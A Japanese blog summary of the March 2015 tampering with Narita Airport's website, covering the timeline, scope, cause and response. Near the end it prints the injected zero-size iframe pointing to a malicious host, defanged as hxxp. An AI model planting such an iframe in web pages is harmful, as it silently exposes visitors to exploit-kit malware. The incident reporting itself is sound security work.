(cache) 2015年3月の成田空港ウェブサイト改ざんをまとめてみた。

2015年3月5日、成田国際空港は同社サイト、及び同社が管理する成田空港のウェブサイトが改ざんされ、改ざん期間中閲覧した際はマルウェア感染する可能性があったことを発表しました。ここではその関連情報をまとめます。

成田空港 ウェブサイト 改ざん概要

図にまとめると次の通り。

この図は次のつぶやき、リンクを参考にしています。

成田空港のホームページが改ざん被害でWindowsユーザーにウイルス配信 ( ソフトウェア ) - 無題な濃いログ - Yahoo!ブログ

成田空港ウェブサイト改ざんはgq, ml, cf, ga, vuドメインなどにホストされているNuclear Exploit Kitへ誘導していた模様。トップページも改ざんされていたのでは？
— 茺田譲治 (@JojiHamada) 2015, 3月 5

公式発表

2015年3月5日弊社ホームページ改ざんに関するお詫びと復旧のご報告 (魚拓)

タイムライン

日付	出来事
2015年3月3日0時20分	成田空港のウェブサイトが改ざんされる
〃	成田国際空港社内PCでマルウェアの検出報告が相次ぐ
2015年3月4日16時30分頃	成田空港が改ざんの事態を把握。*1
2015年3月5日 1時	成田空港のウェブサイトを一時閉鎖。暫定サイトに切り替え。
〃17時37分	成田空港ウェブサイトを復旧。
〃	成田国際空港のウェブサイト改ざんについて発表。

被害概要

改ざん期間中に以下のURLにアクセスするとマルウェアに感染する可能性があった。

成田空港のフライト状況の案内ページへの改ざんは行われていない。

成田空港フライト情報 http://www.narita-airport.or.jp/

改ざんされていた期間

成田国際空港の発表によれば次の期間に改ざんされたページが表示されていた。

2015年3月3日 0時20分～ 3月5日 1時0分

2月以前も改ざんされていたと指摘する情報がある。

成田空港の件で昨日一つ言い忘れてましたが、不正なiframeは「遅くとも2015年2月28日から」(おそらくそれ以前から) 設置されていたことを確認しております。
— Neutral8x9eR (@0x009AD6_810) 2015, 3月 5

改ざん以外の被害について

成田国際空港は現時点(2015年3月5日時点)で個人情報漏洩やウイルス感染による被害などは把握していないと発表。

発端

2015年3月3日に成田空港社内PCがマルウェア感染・検知を大量にあげたことによる。
2015年3月4日16時半頃に連絡があり空港側が把握。連絡元はセキュリティー会社*2、同社セキュリティー担当者*3、グループ会社*4が報じられている。

原因

成田空港のウェブサイトで使用していたコンテンツ管理システム(詳細不明)が不正アクセスを受けたことによる。

対応

2015年3月5日ウェブサイトを一時的に閉鎖、その後対策を行い復旧
2015年3月警察へ相談？(捜査を進めると報道有 *5 )
2015年3月不正アクセスを受けたCMSの閉鎖・手動更新に切り替え*6
2015年3月公開コンテンツの改ざん有無の確認
2015年3月サーバーへセキュリティ対策を追加
2015年3月サーバーのマルウェア感染の有無を確認
2015年3月5日ウェブサイト改ざんについて発表

改ざんの内容詳細

複数のページに次のiframeタグが挿入され、当該ページを閲覧した際に外部のサイトへ接続する状態となっていた。

注意：この外部サイトは2015年3月6日現在も稼働中のためアクセスしないで下さい。

<iframe src="hxxp://acds.pw/" frameBorder=0 width=0 scrolling=no height=0></iframe>
https://malwr.com/analysis/YjczZmI5NzUwMmRiNDFlZmIzNDE4OWY2YTRmN2RhMTI/